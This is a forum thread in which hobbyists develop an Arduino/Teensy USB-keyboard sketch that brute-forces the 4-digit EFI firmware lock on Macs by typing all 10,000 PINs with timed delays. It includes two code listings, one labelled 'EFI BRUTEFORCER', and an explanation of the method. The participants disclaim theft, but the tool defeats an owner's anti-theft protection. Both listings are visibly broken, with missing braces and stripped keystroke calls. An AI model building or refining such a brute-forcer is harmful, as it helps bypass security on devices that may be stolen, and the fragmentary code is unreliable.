Go Down

Topic: Revisiting orvtech's EFI Firmware & iCloud unlock for Macs (Read 4496 times) previous topic - next topic


May 24, 2015, 07:33 am Last Edit: May 24, 2015, 08:37 am by Somerset Reason: added code select
This sketch has been kicked around and modified for years. I would first like to thank orvtech, knoy, Ivan Mendoza, Anaruz, evasoft, yixiy, amora, and all of the others that developed and helped improve this sketch along the way (sorry to those I didn't mention). The original version was written for use with Teensy 3.0 and then later scripted for Arduino Leonardo. The best part of these sketches is they turn bricks back into the useful machines they were intended to be. The worst part of these sketches are the lack of convenience including having to watch the display, the clock, and ultimately work out the attempts over time to actually retrieve what the sketch was written for. Finally, the sketch has been utilized to make companies (and individuals) hundreds of dollars. Devices and "services" are sold on eBay for $60-$100. NerdsArmy even has several versions - the top of the line costing around $450.
My intention is to have great minds working on this again to include the best features at the lowest cost. Instead of the Teensy 3.1 version that leaves you to set up a video recorder, run calculations, and possibly run additional, modified attempts to get to the goal - I think the ultimate device would include the necessary keyboard strokes, mouse movements and clicks, LCD display of counter, and the ability to stop when finished - possibly utilizing a microphone to listen for a reboot chime (if applicable), or a light sensor that can detect the screen change, or by being aware of a USB hardware check.
I don't know the entire Arduino catalog but I'm envisioning the Leonardo with LCD shield for this task. I'm not really concerned with the increase in size and cost but more efficiency and functionality.
I am new to this whole environment and have no knowledge of writing code. I haven't produced or utilized any devices (though I plan to). I've spent more time with hardware and repair which has lead me on this search. I've read many blogs and found there is a lot of great information scattered all around but no convenient one-stop-shop for those who are interested in producing their own, quality, working device with a step-by-step tutorial. Perhaps the community mindset is "if you can't labor through hours, days, and years of blogs and put you're own blood and sweat in - then you simply don't deserve it".
Anyway....The "base" sketches can be retrieved from GitHub.
Here is something I've compiled but it hasn't been tested and more than likely does not work - just a concept or a theory. (Note: it doesn't yet include anything to stop the count when goal is met). Please forgive my ignorance.

Code: [Select]

#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {

lcd.begin(16, 2);
lcd.print("CODE INPUT");
pinMode(ledPin, OUTPUT); // declare LED as output

void loop(){
//lets wait 1 minute and 1 second
  if (loops == 5){
//lets wait 5 minutes and one second
  else if (loops == 6){
//lets wait 15 minutes and 1 second
  else if (loops == 7){
  loops = 0;
//lets get to work
if (counter <= 9999){
  delay(1500); // vs (8000)
  digitalWrite(ledPin, LOW);
  delay(800); // vs (5500)
  digitalWrite(ledPin, HIGH);
  sprintf(pin, "%04d", fakecounter);
  //sending first digit
  //sending second digit
  //sending third digit
  //sending fourth digit
  //sending return

  lcd.setCursor(0, 1);
  lcd.setCursor(1, 1);
  lcd.setCursor(2, 1);
  lcd.setCursor(3, 1);


//reached 4 digit PIN max value
if (counter > 9999){
  for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    digitalWrite(ledPin, LOW);
fakecounter = counter;

Please keep replies and comments relevant and useful.
Thank you.


May 24, 2015, 07:38 am Last Edit: May 24, 2015, 07:38 am by JimboZA
First relevant and useful reply: please edit the post and put the code inside
[code]code here[/code] tags so that

Code: [Select]
it looks
like this

While you're at it, you might like to give the thread a title that actually gives some info.
Johannesburg hams call me: ZS6JMB on Highveld rep 145.7875 (-600 & 88.5 tone)
Dr Perry Cox: "Help me to help you, help me to help you...."
Your answer may already be here: https://forum.arduino.cc/index.php?topic=384198.0


OK, I give up, what is the purpose of the program ?
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.



Even with the change of title, I am still non the wiser.

You have shown us a sketch, that you say is untested.

We don't know what it is supposed to do.

Even if we were to test it for you, how would we know whether it was a pass/fail?


The "device" is supposed to enter (as a USB HID) the 10,000 possibilities of a 4-digit numeric code with delays built in to copy human typing. It also applies mouse movements and/or clicks to keep the computer from going to sleep. (Some variations call for a restart of the computer at certain intervals). In the early stages the sketch only allowed for the keystrokes and the user would have to watch along or set up a video camera, along with a timer, to capture when the code was finally entered correctly. The user would then have to figure how many attempts were made over the period of time and do the math to get close to the code to manually type entries until the exact match was found. Sometimes this also meant running the device again with a narrowed range. Later the sketch allowed for an LCD to display the number that was being entered. This made it easier, since the user didn't have to do the calculations, but the user still had to record the process - as it takes roughly 2 days to enter all 10,000 possibilities. Though the numbers were being displayed, however, the process would keep running even after the correct code was entered. Thus the need for coming up with a way to stop the device - via microphone, light sensor, etc.
Keep in mind this was originally written (and seemed to work best) with the Teensy 3.0 or 3.1. Some have used Arduino Leonardo and that is what I am hoping to build on.

Please allow me to post some links that may help with the explanation:







Thank you for your time and interest.


So this is an attempt to write program to hack an iCloud account.
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.


Let's call it a retrieval device. I do not condone the theft of property or information. In my experience repairing machines, there are many items that are sold online (eBay) that are locked. Just because an item in locked doesn't mean it was stolen. Some of these items could be lost or the rightful owner has past away or simply forgot the firmware password and could not provide all of the necessary information to Apple to unlock them. Apple has become very strict in this regard. What do they care about bricked devices - that just means they're more able to sell new products.
Again, I do not condone any illegal activity or misuse of this device.


I have thrown together this sketch for the brute forceing of the 4 digit EFI code I'm useing the pro micro board and have added the use of a LCD to display the current pin attempt I have tested on a Windows machiene in the note pad and all seems fine I havnt connected a LCD yet as I'm waiting for delivery and I have not yet tested on a efi locked Mac this code is for the padlocked screen not for the icloud screen this is my first attempt at codeing so please bare this in mind any help will be appreciated and if someone could test this with a LCD and on a Mac that would be a grate help I will upload the code in my next post


// This code is licensed under Apache 2.0 License // http://www.apache.org/licenses/LICENSE-2.0.txt // Limitation of Liability. In no event and under no legal theory, // whether in tort (including negligence), contract, or otherwise, // unless required by applicable law (such as deliberate and grossly // negligent acts) or agreed to in writing, shall any Contributor be // liable to You for damages, including any direct, indirect, special, // incidental, or consequential damages of any character arising as a // result of this License or out of the use or inability to use the // Work (including but not limited to damages for loss of goodwill, // work stoppage, computer failure or malfunction, or any and all // other commercial damages or losses), even if such Contributor // has been advised of the possibility of such damages. // This code is indented for people who are not able to contact // apple support and I am in no way liable for any damage or // problems this code might cause.

Code: [Select]

#include <LiquidCrystal.h>

int finishedPINcracking = 0;//

const int ledPin = 13; 

const int digit1_start = 0; 

const int digit2_start = 0; 

const int digit3_start = 0; 

const int digit4_start = 0;

const int digit1_stop = 9; 

const int digit2_stop = 9; 

const int digit3_stop = 9; 

const int digit4_stop = 9; 

LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

void setup() {

lcd.begin(16, 2);

lcd.print("EFI BRUTEFORCER");
lcd.print("ATTACKING EFI");
lcd.print("CODE ATTEMPT");

pinMode(ledPin, OUTPUT);

delay(6000); } 

void loop() { 

if ( finishedPINcracking == 0 ) { 

for( int digit1 = digit1_start; digit1 <= digit1_stop; digit1++ ) {


for( int digit2 = digit2_start; digit2 <= digit2_stop; digit2++ ) {


for( int digit3 = digit3_start; digit3 <= digit3_stop; digit3++ ) {


for( int digit4 = digit4_start; digit4 <= digit4_stop; digit4++ ) { 

if ( (digit4 == 4) || (digit4 == 9) )

{  Keyboard.println(String(digit1) + String(digit2) + String(digit3) + String(digit4)); 

for ( int timer = 1; timer <= 6; timer++ ) { digitalWrite(ledPin, HIGH);  }


digitalWrite(ledPin, LOW); } 

else{ Keyboard.print(String(digit1)); 






lcd.setCursor(0, 1);


lcd.setCursor(1, 1);


lcd.setCursor(2, 1);


lcd.setCursor(3, 1);




Keyboard.println(); } } } } } finishedPINcracking = 1; }}

Go Up